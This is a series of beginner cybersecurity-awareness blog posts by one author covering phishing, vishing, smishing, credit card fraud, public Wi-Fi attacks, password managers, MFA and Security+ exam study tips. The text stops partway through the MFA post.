Holiday Cyber crime statistics (Norton): Holiday cybercrime statistics + tips to protect against threats
Cyber attacks during Holidays (ThriveDX): Cyber Attacks During Holidays: Why the Spike?
Learn about the social engineering tactics and how attackers use this against us:
Social Engineering (Okta): Social Engineering: How It Works, Examples & Prevention | Okta
Learn how to prevent scams from happening:
Holiday Scams (FBI): Holiday Scams | Federal Bureau of Investigation
7 Holiday Security Tips To Try Before The Year Ends(Security Intelligence): 7 Holiday Cybersecurity Tips to Try Before The Year Ends
Check out the rest of our Blog By CC page below for more cybersecurity topics!
References:
What is Log4Shell? The Log4j vulnerability explained (and what to do about it). (2021, December 17). Dynatrace News.
What is Log4Shell? The Log4j vulnerability explained (and what to do about it)
Lekhi, A. (n.d.). Log4J Vulnerability: What, Why and How. Gca.isa.org.
Log4J Vulnerability: What, Why and HowBeyond The Security Alert Dance: Learn Some Useful Steps. (n.d.). Default.
Beyond The Security Alert Dance: Learn Some Useful StepsPublished, K. C. (2022, April 5). Cadbury issue warning over Easter egg scam on WhatsApp. GoodTo.
Cadbury issue warning over Easter egg scam on WhatsApp[Scam Alert] Free Cadbury Easter Chocolate Basket Scam | Trend Micro News
NOV 9, 2022
Resources and Tips to Help You Study for Your CompTIA Security+ Exam
by Eula Chua
November 9, 2022Leading up to it, I had doubted myself. I didn’t think I was going to pass because my study habits weren’t perfect. But I remembered that I had made a commitment to myself from the beginning of this cybersecurity journey, to pass this exam even if it takes me multiple times to do it.
Last month, I’m happy to share that I finally earned my very first cybersecurity certificate: CompTIA Security+ SY0-601. Passing this exam truly affirmed my decision to begin a career in this field. The learning never stops.
Although everyone has their own way of studying, I want to share with you the resources and tips that have helped me successfully pass this exam. I cannot guarantee that you will pass the exam as what I’m sharing is based on my own experience, however, with the amount of time and work you put in, your success and efforts will show in the results. I hope that what I share helps you in any way.
Resources
The first thing I did was research and find the appropriate study material for Security+ that worked for me. This took some time until I finally decided which courses and practice exams to stick to. There are a lot of free/affordable resources available out there, especially on Youtube and Udemy. It can get overwhelming. Know your learning style and choose accordingly. Check out this page to learn about different learning styles: VAK
For myself, I learn best by doing all three: learning by seeing/writing, listening, and doing. I made sure to use resources that would aid me in my learning. I chose multiple resources to ensure each topic is fully covered in-depth and explained in different ways to help me understand the concepts. Most of the courses listed include additional hands-on labs that are not a part of the exam but are there to reinforce your learning.
Here are the resources that have helped me:
For visual/auditory learning (learning by seeing/writing and listening):
Jason Dion’s CompTIA Security+ (SY0-601) Complete Course and Exam: CompTIA Security+ Complete Training Course & Practice Exam
Darril Gibson’s CompTIA Security+ Get Certified Get Ahead Sy0-601 Study Guide: About Security+ SY0-601 - Get Certified Get Ahead
Professor Messer’s CompTIA Security+ SY0-601 Training Course: CompTIA Security+ SY0-601 Training Course
For kinesthetic learning (learn by doing):
Jason Dion’s CompTIA Security+ (SY0-601) Practice Exams & Simulated PBQs: CompTIA Security+ (SY0-601) Practice Exams & Simulated PBQs
Professor Messer: Professor Messer's CompTIA SY0-601 Security+ Success Bundle - Professor Messer IT Certification Training Courses
DojoLab - PBQ practice exams: CompTIA Security+ SY0-601 PBQs, Certification Tests & Labs
Here are other highly recommended resources that you may also prefer:
Ian Neil’s Security+ Study Guide: Home
Mike Meyers and Dan Lachance’s Total CompTIA Security+ Certification (SY0-601): TOTAL: CompTIA Security+ Certification (SY0-601)
Mike Chapple’s Security+ resources: Security+ Study Group - CertMike
Pocket Prep’s Security+ Practice Exam: CompTIA® Security+
LearnZapp’s CompTIA Security+ SY0-601 Prep (iOS and Android): Learnzapp - CompTIA Security+ SY0-601 Exam Prep Mobile App - Darril Gibson
CompTIA Official CertMaster: CertMaster Practice for Security+ Exam Prep | CompTIA IT Certifications
Tips
You can use multiple study materials. It might be better as some instructors provide in-depth information and examples about a topic whereas others briefly go through it. But if one is enough, do what works for you.
CompTIA Security+ lists out all the objectives and acronyms for the exam. Use this to your advantage. You can find it here: Exam Objectives
Create a study schedule/timeline. It’s okay to fall off the tracks when it comes to studying. Having a timeline will help you get back on track and stay consistent.
Check for discount vouchers included in the courses/study material you purchased. Most authorized instructors will include a discount voucher for your exam.
Schedule your exam ahead of time. This will help you stay accountable in your studies. If you don’t, you might not end up doing it. Depending on the organization, you might be able to reschedule if the original date you set no longer works for you.
The exam is composed of multiple choice questions (MCQ) and performance-based questions(PBQ) (i.e. matching, fill-in-the-blanks, etc.). Many suggest doing MCQs first and leaving all the PBQs last as they can be time-consuming. More information about the exam will be available on the official CompTIA website.
You’ll see others recommend taking the exam after 1 month of studying. Some recommend 9 months. Everyone has their own pace. Focus on your path and choose a timeline that works best for you.
Stay focused and believe in yourself.
Want to study with us? Subscribe to Cybersecurity Central on Youtube and get notified for our #SecurityFriday videos: Cybersecurity Central
Are you thinking of taking the CompTIA Security+ certification? Let us know how you do on our LinkedIn post: https://www.linkedin.com/company/cybersecuritycentralorg/
Good luck with all your studies!
Check out Resources by CC for even more learning tech and infosec resources!
NOV 2, 2022
Credit Card Fraud: Tips For Prevention
by Eula Chua
November 2, 2022Black Friday, Cyber Monday, and Boxing Day are coming before we know it. As we head into the holiday shopping season, I want to bring some awareness to credit card fraud.
As reported in the 2020 Federal Trade Commission Report, credit card fraud is ranked as one of the main types of identity theft reported and continues to rise.
Credit card fraud is an act of obtaining another individual’s credit card information without authorization or their knowledge, by placing random, unusual purchases, withdrawing funds, or creating new accounts. The fraudster’s main motive here is financial gain.
Credit card frauds happen more often than we think. To get a grasp of how it’s looking, check out Card Rates.com: 15 Disturbing Credit Card Fraud Statistics
Credit card fraud can occur in multiple ways, not limited to:
CNP (Card-Not-Present) Fraud: This is when someone uses your credit card without physically having it on them. This is possible if the fraudster knows your full credit card information (account number, expiry date, and card verification code) and can be done over mail or on a network.
Account Takeover: Similar to CNP fraud, this is when the attacker uses your known information to verify their identity as the actual owner of the account. In this case, they now have access to change their address and can request a replacement card that they can use and abuse.
Stolen/Lost Credit Card Fraud: If these cards are found by a criminal, they might have troubles making purchases in-person, due to the PIN number requirement. This still gives them an advantage to make purchases online.
Credit Card Skimming: With the use of a fake machine, your credit card details that are held in the magnetic strip can be stored when it is swiped.
Mail Non-Receipt Card Fraud: If you're expecting a new or replacement card to get sent to your mailbox, there is a chance that a criminal can get a hold of it. Once they do, they have the power to register the card and abuse it.
Although large-scale companies have a fraud investigations and data loss prevention team that work endlessly in the back end, doing our part as users and credit card owners in combination with the back end teams will help effectively prevent credit card fraud from happening to us.
What can we do right now?
Here are some practical tips we can do to prevent or to stop credit card fraud:
When you notice suspicious activity on your account, call your credit card company ASAP and have them cancel your account and request a replacement.
Always check the machine(s) you’re inserting your card into. Do all the other machines around it look the same? Are there any external attachments on it?
Ensure that the PIN number is not a common PIN that you have used before or with other accounts.
For online banking, review the password policy and requirements of your bank and ensure you are using proper password hygiene. (To read more about password management, read my blog post here: CYBERSECURITYCENTRAL - Blog by CC)
Protect your information. Do not share your credit card and relevant documents associated with it to anyone or anywhere, not even to your closest loved one.
Ensure your credit card is kept at a safe place after each use.
Resources:
Sandberg, E. (2020, August 24). 15 Disturbing Credit Card Fraud Statistics:
Helbock, M. (2019). 11 Common Types Of Credit Card Scams & Fraud | ConsumerProtect.com
OCT 26, 2022
Vishing Attacks in Depth
by Eula Chua
October 26, 2022Once upon a time, we lived in a world without caller ID. Every time the phone rang, all we could do was answer it, hoping it wouldn’t be a random stranger trying to impersonate a service provider. It was highly likely that an adversary would pull this scam tactic.
You might ask, what is vishing?
Vishing is a form of phishing — a portmanteau of “voice phishing”. This occurs when an attacker utilizes a phone system to lure their targets into providing their personal information or credentials, mainly for financial gain. As caller IDs became a necessity in the telecom world, it helped filter out which phone numbers should be trusted based on what we know. But even then, attackers still found ways to overcome this challenge, which is why it still happens occasionally. In present time, VoIP (Voice over IP) technology is often used for these attacks because it’s easier for the attacker to pretend that they are from an actual known company, by spoofing their caller ID and setting up fake phone numbers that are difficult to track.
In vishing attacks, the adversary falsifies their identity by pretending to be a person of authority. The common vishing attacks that many hear about relate to tech support scams and automated scare-tactic voice messages. To be effective, most attacks similar to this are combined with other types of attacks such as identity fraud or ransomware attacks.
So, do they still happen?
The answer is yes.
Although phishing scams are more popular, according to Kroll (2022), vishing attacks have been on the rise, especially in 2022, and have been “occurring more than 1-in-4 times out of all types of response-based threats.” The more that technology develops, the more sophisticated and motivated these adversaries are to find ways to create these cyber attacks.
Below are some key patterns we all need to be aware of when encountering potential vishing attacks. For some extra context, here is a list of vishing attack principles compiled by the experts of Kroll (The Rise of Vishing and Smishing Attacks – The Monitor, Issue 21 | Kroll) for reference:
Urgency - Creating a sense of urgency creates stress and overwhelms the target so they are likely to give in to what is being requested.
Retrieving Sensitive Information - Personal or sensitive information is what an adversary aims for. The motive is to use the requested information for monetary gain. Most organizations do not ask for sensitive information over the phone, especially credit card numbers or social security numbers. If this occurs, this may be an indicator of a vishing attack.
Request for Computer Access - This is a common indicator for hoax or fake virus attacks. Organizations do not usually request people for remote access to their device.
Legitimate Claims - This is used in order for fake organizations to gain trust with their targets by pretending they are reputable. The next time a hacker asks for any information, the victim is likely to share it.
Voice Synthesizing - This is used to conceal an adversary’s identity when speaking to a target. Voice distortion may indicate a scam.
To avoid falling for vishing attacks, it is important to be aware of the characteristics and traits. Knowing how an attack works gives users the advantage to prevent future cyber incidents.
A few key points to remember:
If the number is unfamiliar, take caution when speaking to the caller
Take the time to search where the phone number or area code is from
Avoid sharing personal or sensitive information, such as your account numbers, SIN/SSN, or passwords
Do not pick up calls from unknown numbers and allow it to go through voicemail
As we are in the last week of Cybersecurity Awareness Month, let’s continue to strive staying safe online. Continue to protect your information and always stay vigilant. As mentioned earlier, the more technology develops, the more threat actors discover ways to trick users.
Remember, cybersecurity criminals never sleep! #Becybersafe all year round and keep an eye out for more related content here at Cybersecurity Central!
OCT 19, 2022
Analyzing a Smishing Attack
by Eula Chua
October 19, 2022Phishing attacks have become more sophisticated and found their way to other avenues. This week, I will be helping you analyze a Smishing attack.
A Smishing attack is part of the phishing family. It’s a cyber attack where text messages are sent by an attacker to trick victims into clicking a malicious link, sharing sensitive information, or sending money to a “trusted” organization. The characteristics and motives are almost identical except for the fact that it’s sent via SMS. Smishing can also be used to obtain verification codes if the target’s phone is used for multi-factor authentication for their credentials.
Since text messages do not have a dedicated spam folder, we cannot filter them out. They come through easier and are more likely to be opened by users who are unaware whether they are spam or not.
The following image is an example of a text message I received from someone claiming to be “Canada Revenue Agency” or CRA. In America, the equivalent would be the IRS (Internal Revenue Service). In the perspective of a user, it may be hard to identify whether this is coming from the actual agency.
In regards to this example, here are some questions to ask:
Is this the right phone number for the organization they are claiming to be?
What is the number for the CRA?
Would the CRA actually state the amount of money owed?
Is the phone number you received this text from subscribed to the CRA?
Is the CRA actually partnered with Interac?
Smishing schemes are made to create doubt in our thought process. This is one of the main tactics of conducting a successful attack. To help combat this, the questions you ask yourself will lead you to make the right judgement, especially if you’re not sure when you encounter a text message like this. I recommend approaching text messages like these with a curious mind. Think critically and ask yourself questions. If you feel like something is fishy, then you’re probably right.
Instead of me listing out what may be suspicious about this, I want you to try figuring out this one. Take out a pen and paper or your digital notes. What are some of the red flags you see in this text message?
Share it with us by snapping a photo or a screenshot and send it in our LinkedIn comments section of this week’s #BlogByCC post!
SEP 28, 2022
Cybersecurity Awareness All Year Round
by Eula Chua
September 28 2022We have a lot coming for you this October for Cybersecurity Awareness Month. To get you prepared for what’s to come, here’s a quick background of what Cybersecurity Awareness Month is about.
In October 2004, Cybersecurity Awareness month was established as a joint initiative by the National Cybersecurity Alliance and the U.S. Department of Homeland Security.
With the continuous rise of confidential data being uploaded online and the rise of current and upcoming cyber threats, this month is about creating awareness to help all types of users stay safe and protected online.
This year's campaign theme is, “See Yourself in Cyber.” Technology continues to adapt and improve every single day. This year’s main focus will be on putting people first when it comes to cybersecurity. As developers, administrators, or end users, we all play a part in technology. It’s important to highlight preventable measures we can take to protect our online privacy and data, in the hopes of building up a safer cyber space together. For more information, check out:
Cybersecurity Awareness Month | CISA
Although we have a whole month dedicated to Cybersecurity Awareness, did you know that there are other days where we can celebrate it all year round? Here are more days that you can add to your calendar:
January 24th to 28th: Data Privacy Week
February 8th: Safer Internet Day
February 14th: National Clean Out Your Computer Day
March 31st: World Back-up Day
April 12th: Identity Management Day
May 5th: World Password Day
All of October: Security Awareness Month
October 29th: National Internet Day
November 13th to 19th: International Fraud Awareness Week
November 30th: Computer Security Day
Are you participating in this year’s Cybersecurity Awareness Month?
Connect with us on Cybersecurity Central's socials and tell us about it!
CC on LinkedIn: https://linkedin.com/company/cybersecuritycentralorg
CC on Twitter: https://twitter.com/cybersecuritycc
CC on YouTube: https://youtube.com/cybersecuritycentral
SEP 21, 2022
Staying Safe in the Digital World
by Eula Chua
September 21 2022Not many realize it., but the need for cybersecurity has increased in today’s time and will continue to increase as technology progresses.
Earlier this week, I encountered an elderly client who told me that he did not want to give out his email address unless it was absolutely necessary. This led him to share about a deepfake AI incident he heard about, where another elderly person was lured into believing that the service provider she was communicating with was the “actual” service provider, when in fact, was a scam. She lost thousands of dollars and had a lack of support. It was devastating to hear but even more devastating to know that incidents like this happen daily without us even knowing.
I decided to pursue the path of cybersecurity early Spring of this year. It has become more and more evident to me how important it is to implement it on every level, from your personal devices and home networks to small-medium sized businesses, large corporations, and industrial control systems, and to create awareness designed differently for each age group.
Like the following quote, “Your internal reality becomes your external reality.” (Unknown), it’s relevant to say that this applies everywhere, even in the cyber world. If the internal systems are flawed or compromised, it might show as a data breach, a business closure, or financial loss.
If you haven't been keeping up with Simply Cyber’s Daily Cyber News Brief every weekday, you are missing out! First of all, the community never has a dull moment; second, there is always something happening in the digital world that we don’t hear about on mainstream news. Technology changes every day. Being informed about what is happening is an effective way to learn how to prevent ourselves from getting compromised.
As we approach Cybersecurity Awareness Month in October, below are some great resources to better prepare ourselves and help protect one another from online incidents:
National Cybersecurity Alliance (US): Home - National Cybersecurity Alliance
National Public Awareness Campaign (Government of Canada): Get Cyber Safe
Layer 8 Security Champions (UK): Champions Hub Membership
Read my previous blog post on End-User Awareness at CYBERSECURITYCENTRAL - Blog by CC
Cybersecurity Central is proud to be an official 2022 Cybersecurity Awareness Month Champion organization with National Cybersecurity Alliance.
There’s no better time than to start now. Stay safe, stay aware, and stay secure.
SEP 7, 2022
Offline vs. Online Identities
by Eula Chua
September 14, 2022Did you know you have two identities? Well technically, it’s two parts of your identity. Don’t worry, I didn’t either but it turns out that the identity we normally refer to is only one half of what we have. Many forget that our digital identity counts and is as important as our real-life identity.
Let’s call them: offline and online. So, what’s the difference?
Our offline identity is what we mostly refer to. It is who we are, our real-life personas, and how others know us. This is the identity we use at home, at work, or at school. The offline identity includes personal details of our life that even our friends and family might know, such as our full name, date of birth, age, address, and even our favourite colours.
Our online identity is the digital identity that we carry, that indicates who we are and how we present ourselves. This is our online persona. This can include our usernames, emails, or aliases for our accounts. The moment we are active on the web is the moment our online identity is established, regardless whether we create an account online or not.
It’s important to keep in mind that both identities should be secured as each one comes with different risks. Even if one is more secure, this could still pose a risk to the other as both offline and online identities can be entryways or an attack surface.
What preventable measures can we take to protect our offline and online identities?
Awareness is key. Let’s first look into social engineering.
Social engineering attacks are a common way to gain information using social tactics. As we will look into the specifics of social engineering attacks in the future, for this topic, we will focus on shoulder surfing.
Shoulder surfing is a type of social engineering attack where someone casually observes over the shoulder of another person to gain unauthorized information. This is a simple technique that is used for gathering sensitive information, such as credentials, or monetary gains and is often committed in office environments.
Check out some practical ways to prevent shoulder surfing:
Position screen monitors in a way where other unauthorized personnel are unable to see them (away from windows, counters, or open spaces)
Adjust the screen brightness or use a screen filter that is attachable to the monitor to restrict the visibility of the screen to surrounding bodies
Additional steps we can take are to avoid using the things in the list below, to help protect our identity:
Personal information in our usernames or passwords
Full name, if not required
Parts of our address and phone number
The same username and password combinations, especially for our financial accounts
Super-odd usernames and reusing it over again for other accounts – this can be easy to track
Usernames with password clues or consecutive patterns, for example: having a series of numbers and letters, including the first-part of two-part phrases
Now that we know that our identity is split into two parts, let’s make sure we protect both identities as best as we can. Help us spread awareness by sharing our blog to your network!
To learn more about your digital identity, check out the references below.
References:
Digital identity for individuals. (2017). NIST. https://www.nist.gov/itl/applied-cybersecurity/tig/digital-identity-individuals
Gibson, D. (2020). CompTIA security + : get certified get ahead SY0-601 study guide. Ycda, Llc.
Introduction to Cybersecurity. (2018, January 22). Networking Academy. https://www.netacad.com/courses/cybersecurity/introduction-cybersecurity
SEP 7, 2022
Common Attacks on Public Wi-Fi
by Eula Chua
September 7, 2022From an end user’s perspective, it can be exciting when we find free Wi-Fi is available. Unfortunately, “free” does not always mean it’s safe to use. In today’s blog, we will bridge from last week’s blog topic, Public Wi-Fi is Not Your Friend, and highlight some of the risks of using public Wi-Fi.
Although there are many risks that can occur, we will focus on the following three common attacks:
Identity Theft
Man-In-The-Middle Attack (aka On-Path Attack)
Session Hijacking
Identity Theft
We often use our identity to verify who we truly are in order to open or access important accounts like our bank accounts. It is crucial that we keep our personal information safe and protected to prevent others from stealing it. This is what identity theft is – when someone steals your personal information such as your name, address, credit card information, social security numbers, health insurance numbers and more. Those who attempt to steal these sensitive information often use it to commit identity fraud for financial gain. To prevent identity theft from occurring, especially under public wi-fi, avoid visiting websites where you’re required to fill in your personal information or bank login credentials.
On-Path Attack/Man-In-The-Middle Attack
With an open connection, there can be an influx of network packets traveling within that network all coming from different devices. This is susceptible to an on-path attack, where a different, and possibly malicious, computer can intercept the connection between two other computers within the same network. This is a form of active eavesdropping. Be aware that any unusual activity, such as having large amounts of data transfers occur over public wi-fi, may possibly indicate an on-path attack. For prevention, devices are recommended to be equipped with anti-malware software, firewalls, and intrusion detection systems. As with any device, ensure that strong passwords are always used and that software are regularly patched and updated.
Session Hijacking
Session hijacking is similar to the on-path attack. The goal is to either steal personal information, execute a denial-of-service attack, or infect a system with malware. Rather than intercepting between two computers, the malicious hacker intercepts a connection between the computer and the server of a website by recording your session ID. Session IDs may be attached to links or requests that are sent to the websites you visit. Active, passive, and hybrid are the three different types of session hijacking attacks that also include different techniques on how it’s conducted. To prevent this, avoid clicking links you’re unsure about, make sure to log out of your accounts in each session to terminate it, install a firewall and anti-virus software on your device, ensure that the websites that are visited are secured, with URLs beginning with “HTTPS”, and last but not least, use a VPN (virtual private network). Using a VPN will make it more difficult for hackers to intercept traffic.
In Conclusion
There are many other threats out there that need to be covered, but we will need to take things one step at a time. The more devices we hold, the more points of entry we have open. Cybersecurity attacks and breaches happen quite frequently and the scary part is that we might not even know it’s happening until it reaches the news. Prevention is one of the best ways to protect ourselves and our systems from any attack. We don’t always know how to prevent unless we know what we are preventing from. This is why the importance of cybersecurity awareness is crucial to all users. We hope that we can continue to bring you more cybersecurity awareness content to you here at Cybersecurity Central to help you stay protected online.
AUG 31, 2022
Public Wi-Fi is Not Your Friend
by Eula Chua
August 31, 2022I have been deceived and probably, so have you.
There was a time in life when my friends and I would get excited when Wi-Fi became publicly accessible in certain coffee shops, restaurants, airports, and libraries. This meant that we didn’t have to spend extra money to pay for cellular data overages.
We would instantly connect wherever public Wi-Fi was available as if he hit a jackpot. Okay, maybe that’s a little exaggerated. But it defined the quote, “the best things in life are free.”
Although that quote does not exactly hold true. It should have been, “the free things in life come with consequences.” Here is where convenience versus security comes to mind.
Public Wi-Fi is not our friend. Connecting to it puts ourselves at potential risk. At your discretion, you can use it when it comes to desperate measures but if it’s possible, avoid it at all costs.
I’ll tell you why.
There are probably hundreds of people passing by the same location as you. This means with these hotspots, any one of these people can connect. This also means any one of these people may be a cyber criminal.
Another point to think about is how the public Wi-Fi was configured. Was it properly secured? Are you able to gain access to the network as an admin? Maybe they didn’t change the default settings on their router.
Here are a few risks that may be encountered through using public Wi-Fi:
Identity Theft
Data Breach
Man-in-The-Middle Attack (aka On-path attack)
Eavesdropping/Packet Sniffing
Session hijacking
Unencrypted connections
Malware distribution
We will go over each one of these in a future post. But for now, what can we do to protect ourselves and mitigate the risks that we can control?
Here is a list compiled by Get Cyber Safe, a Canadian national public awareness campaign:
Turn off the Wi-Fi on your device in a public Wi-Fi zone if you’re not connected to the Internet
Ensure that a firewall is enabled
Be careful what you browse and avoid visiting websites that contain sensitive information
Use a VPN (virtual private network) that encrypts data and allows you to browse under a secure network
Be wary of shoulder surfers that may be watching your screen
Ensure that websites you visit are using HTTPS, not HTTP
Do you have other recommendations, tips, or tricks on how to protect ourselves online? Visit us on social and let us know!
Below are some great resources and studies to check out regarding public Wi-Fi:
-
https://irjhis.com/paper/IRJHISIC2203054.pdf
Until next time, stay safe out there… and online!
AUG 24, 2022
Let’s Talk About Phishing
by Eula Chua
August 24, 2022Did you know there are different kinds of phishing attacks that exist? First, let’s define what phishing means.
According to Phishing.org, phishing is “a cybercrime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords.”
Phishing is one of the most common ways for cyber attackers to target people online via email. Many times, this type of attack is used on specific groups of people or high-profile individuals to gain personal information and most of the time, for financial gains.
As phishing continues to adapt, cyber attackers have found other communicative pathways to trick users into providing information. Some examples are voice messages, SMS text messages, and phishing through search engines. There are multiple ways in which phishing techniques are conducted, however, in today’s blog, we will be focusing on the different types: email phishing, vishing, smishing, spearphishing, and whaling
Email phishing
When we hear phishing, we automatically think of email phishing. That’s because it is the most common technique used to conduct a phishing attack. If you check your spam/junk folder in your inbox right now, you might notice emails coming from unknown email addresses with odd subject lines. There could also be emails coming from people you think you know. Beware that the purpose of phishing is to trick users into revealing personal information and believing that the sender or organization is legitimate. How is this conducted? Usually, phishing attacks that are done through email may contain links that lead to a malicious website that appears legitimate. These websites could either load up a trojan virus or something that enables you to input your credentials. Other emails could contain malicious attachments.
Vishing aka. Voice phishing
Vishing is a combination of “voice” and “phishing”. This occurs when a “phisher” utilizes a phone system to lure their targets into providing their personal information or credentials, mainly for financial gain. VoIP (Voice over IP) technology is often used for these attacks because it’s easier for the attacker to pretend that they are from an actual known company, by spoofing their caller ID.
Smishing aka. SMS phishing
“SMS” and “phishing” make up the term “Smishing”. Rather than it being done through email, phishing is done via text message. With the same purpose of gaining personal or financial information from a target, malicious links and attachments can also be sent through text. Smishing can also be used to obtain verification codes if the target’s phone is used for multi-factor authentication for their credentials.
Spearphishing vs. Whaling
If you get these two terms mixed up, you are not alone. Let’s go over the main differences.
Spearphishing is a specific type of phishing in which an attack is conducted on a particular person or specific groups of users, most often within an organization.
Whaling is a specific type of spearphishing, where a high-level executive is either the victim or the one being impersonated.
There are so many different ways a phishing attack can be done. Importance of end-user security awareness is crucial to our online safety and privacy as phishing attempts occur every minute of every day.
As end-users, how can we do our part to prevent these phishing attacks from progressing?
First and foremost, staying informed about these types of attacks help bring awareness. Being knowledgeable of what we are up against will help us find methods on preventing these attacks from surfacing.
Stay curious and think before you click. If you’re not familiar with the sender and the purpose of the email, do not click the link. If you think you might know the sender but are unsure why they may be sending you an attachment, directly contact the person via phone to verify that they actually intended to send that email.
Never give out personal or financial information to people you don’t know over the internet and especially through email.
Double check the URL address of the link. Hover your mouse on the link (do not click it) and see if the URL comes from a legitimate website
Verify the website's security by ensuring the URL address starts with an “HTTPS” and contains a lock image beside it.
Do not trust pop-ups. Sometimes they can be deceived as part of the website you’re intending to visit. If you’re not sure what the pop-up is about, close the window immediately.
Use anti-virus software or enable a spam filter that helps block malicious emails and websites.
If you would like to learn more about phishing, here are some great resources to visit:
- https://www.getcybersafe.gc.ca/en/blogs/phishing-introduction
- https://www.microsoft.com/en-ca/security/business/security-101/what-is-phishing
- https://cybersecurityguide.org/resources/phishing/
- https://www.phishprotection.com/resources/what-is-phishing/
AUG 17, 2022
Password Management 101
by Eula Chua
August 17, 2022We’re exposed to an ocean of information to the point where I can’t even track how many times I’ve seen a post or meme on passwords on paper notes. It’s basically second nature to many of us in the technical field to know that’s something that should always be avoided. It only really hits us when we see another person commit the unforbidden. Then it leaves us in shock.
This happened to me the other day. Upon helping one of the most patient customers I have served, I couldn’t help but noticed that her passwords were stored on a piece of paper tucked in her wallet. I haven’t realized.
You may ask why I’m bringing up this story.
–
It’s always been a battle between convenience and security.
We’re in a day and age where we have to create multiple accounts for multiple online services and platforms. When it comes to passwords/passphrases, it’s easier for us to write them down on a piece of paper or create a password we can easily memorize. When it comes to convenience, time is valuable and although we want things quick and ready to use, security is on the line. When it comes to security, there are so many steps we need to comply with. How can we find the balance between convenience and security?
Although it may take time before we get to that point, let’s take charge of what we have control of today. As end-users, we are the first line of defense. A big focus we can work on is practicing proper password hygiene.
Before we go and start changing passwords right away, let’s take a moment to reflect on these questions:
Have I been writing down my passwords on paper or on a digital note?
Am I using a password manager?
Are my passwords all the same?
Did I use personal information as my password or a part of my password, such as my date of birth, my pet’s name, my favourite colour etc.?
Do I have a mix of characters, numbers, and symbols in my password?
How long is my password?
Am I using multi-factor authentication in my accounts?
Have these questions got you thinking about your current passwords? If so, don’t worry. You are not alone. It may seem overwhelming to have to change every password for every single account. Know that it will take time. Something that has worked for me is utilizing a password manager to keep track of all my accounts and passwords. Whenever I come across an account I have to log in to, I would add it to the password manager, reset my password, and store it.
Before I continue, you may ask, “How does a password manager work?”
Essentially, a password manager uses a secure encryption process to ensure that any password data that transmits online is protected and difficult to crack. While multiple passwords are stored, the main way to access them is by using a master password. This makes it easier for us to remember one password rather than hundreds of passwords. Combining this with multi-factor authentication makes it even more secure. Password managers are one of the safest and most secure tools to use. Nonetheless, complex password requirements should not be neglected.
“What are the complex password requirements we should follow to ensure that they are harder to figure out?”
Some common ones, which you may have also read when creating passwords for new accounts are:
Contains lowercase characters
Contains uppercase characters
Contains digits (0-9) and symbols (~!@#$%^&*...)
Having a length of 12-24 characters
No common names or dictionary words
Use passphrases rather than passwords
No sequences of more than 4 digits in a row
No previously used passwords
Now that we have gone over password complexity requirements and a brief introduction to password managers, here are some notable ones you can start with:
Bitwarden (Bitwarden Open Source Password Manager)
Works with Windows, MacOS, iOS, Linux, Android, web, browser extensions, command line
Open source
Has 2FA (two-factor authentication)
Offers both a free tier and a paid tier (free tier goes a long way)
Unlimited password storage
Accessible across multiple devices
LastPass (#1 Password Manager & Vault App with Single-Sign On & MFA Solutions)
Supports multiple browsers and platforms
Has 2FA
Can be used for personal or business purposes
Can use a passwordless login
Includes dark web monitoring
Offers both a free tier and a paid tier (free version does not sync passwords across devices)
1Password (Password Manager for Families, Businesses, Teams | 1Password)
Wide variety of browser support
Supports 2FA
1GB storage space
Shared password feature up to 5 family members
Password auditing
14-day free trial and paid tier only
There are lots of options out there so make sure to do more research and find one that suits your needs.
Changing passwords from multiple logins can take up lots of time and can be overwhelming. Remember to start small and change what you can. Over time, you’ll be able to meet the complexity requirements for every password. The most important part to note here is that practicing password hygiene prevents future compromises. Let’s continue to do our part and stay safe online.
AUG 10, 2022
Multi-Factor Authentication: Factors In-depth
by Eula Chua
August 10, 2022Almost everything on the Internet requires us to sign up for an account, whether it’s creating an email, a social media profile, or even an account for an e-commerce website. Yet so many data breaches and phishing attacks occur often without our knowledge. Check out this article by Nasdaq on skyrocketing data breaches:
Data Breaches Continue to Skyrocket in 2022
What can we do to protect ourselves on our end?
Multi-Factor Authentication (MFA).
Multi-Factor Authentication is an authentication method that helps verify the identity of the correct user logging in their account. Although usernames and passwords is a method on its own, having only one way to authenticate an account does not fully prevent unauthorized users from accessing it. MFA adds extra layers of protection to keep potential hackers from progressing their attack.
There are 7 Factors/Attributes of Authentication that we will delve into:
3 Factors:
- Something you are
- Something you have
- Something you know
4 Attributes:
- Something you do
- Something you exhibit
- Somewhere you are
- Someone you know
1. Something you are
This factor requires information that is you and only “you”. By this, we mean biometrics. This mainly comes in the form of scanning physical traits, such as your face, retina, fingerprint, thumbprint, voice identification, palm, and more. Do you own any Apple devices? If so, biometric scanning is something you might already be familiar with. Think of Face ID and Touch ID.
2. Something you have
This type of authentication factor asks for something a person physically carries or refers to a token key. A token key is a physical device that generates numbers to help identify that the person logging in is (hopefully) authorized. Some other examples are ID smart badges, a physical key, an authentication app on your phone, and common access cards (CACs).
One-time passwords (OTPs) are one of the common security methods used for MFA and are self-explanatory—use the password once and it’s done. The app using the OTP method would automatically generate a new password to use for next time a login is required. Two types of OTP methods are Time-based one-time password (TOTP) and HMAC-based one-time password (HOTP). Here’s a quick comparison.
TOTP
- Time-based/timestep: the temporary password is only valid within a certain amount of time (usually 30-60 seconds)
- Examples: Google Authenticator App, Microsoft Authenticator App, SecureAuth App
HOTP
- Counter-based: once the temporary password has been used, it will automatically increment by one until it is requested and validated again
- HMAC stands for Hash-based Message Authentication Code, which is an event-based one-time password method that relies on a counter
- Example: Yubiko’s YubiKey
3. Something you know
This factor mainly refers to a specific memory where it can be retrieved when required. Some examples would be personal security questions, passphrase, or personal identification number (PIN). A common example of this would be a password. Passwords are restricted pieces of information that most of us need to remember and retrieve when logging into an account. Using this as a sole method of authentication is not secured and is susceptible to the account getting compromised. This is where the use of password managers come in. Many people are still questioning the use of password managers but for the most part, it has been one of the safest ways to store all your passwords in one. We’ll talk more about proper password hygiene and password management in our future blog posts.
4. Something you do
This is one of four attributes where a physical action is observed. Something is done, a gesture or a touch, in order to gain access or to unlock. A common example for this would be signatures, which can be challenging to reproduce due to the pen movement and its two-dimensional output.
5. Something you exhibit
In most cases, this isn’t commonly included as a factor of authentication but we’ll include it here. This is a specific trigger and response type, similar to “something you are”, to determine whether a response is true or false. An example of this would be a lie detector test.
6. Somewhere you are
This is a factor that uses a person’s location to authenticate a login. This uses Internet Protocol (IP) and Media Access Control (MAC) addressing to indicate where the login attempt is occurring. In some apps or social media platforms (Instagram or Facebook for example), this feature is used to alert the user if a suspicious sign-in attempt was done at an unfamiliar location. This way, the user can make a decision whether to reset their password or not.
7. Someone you know
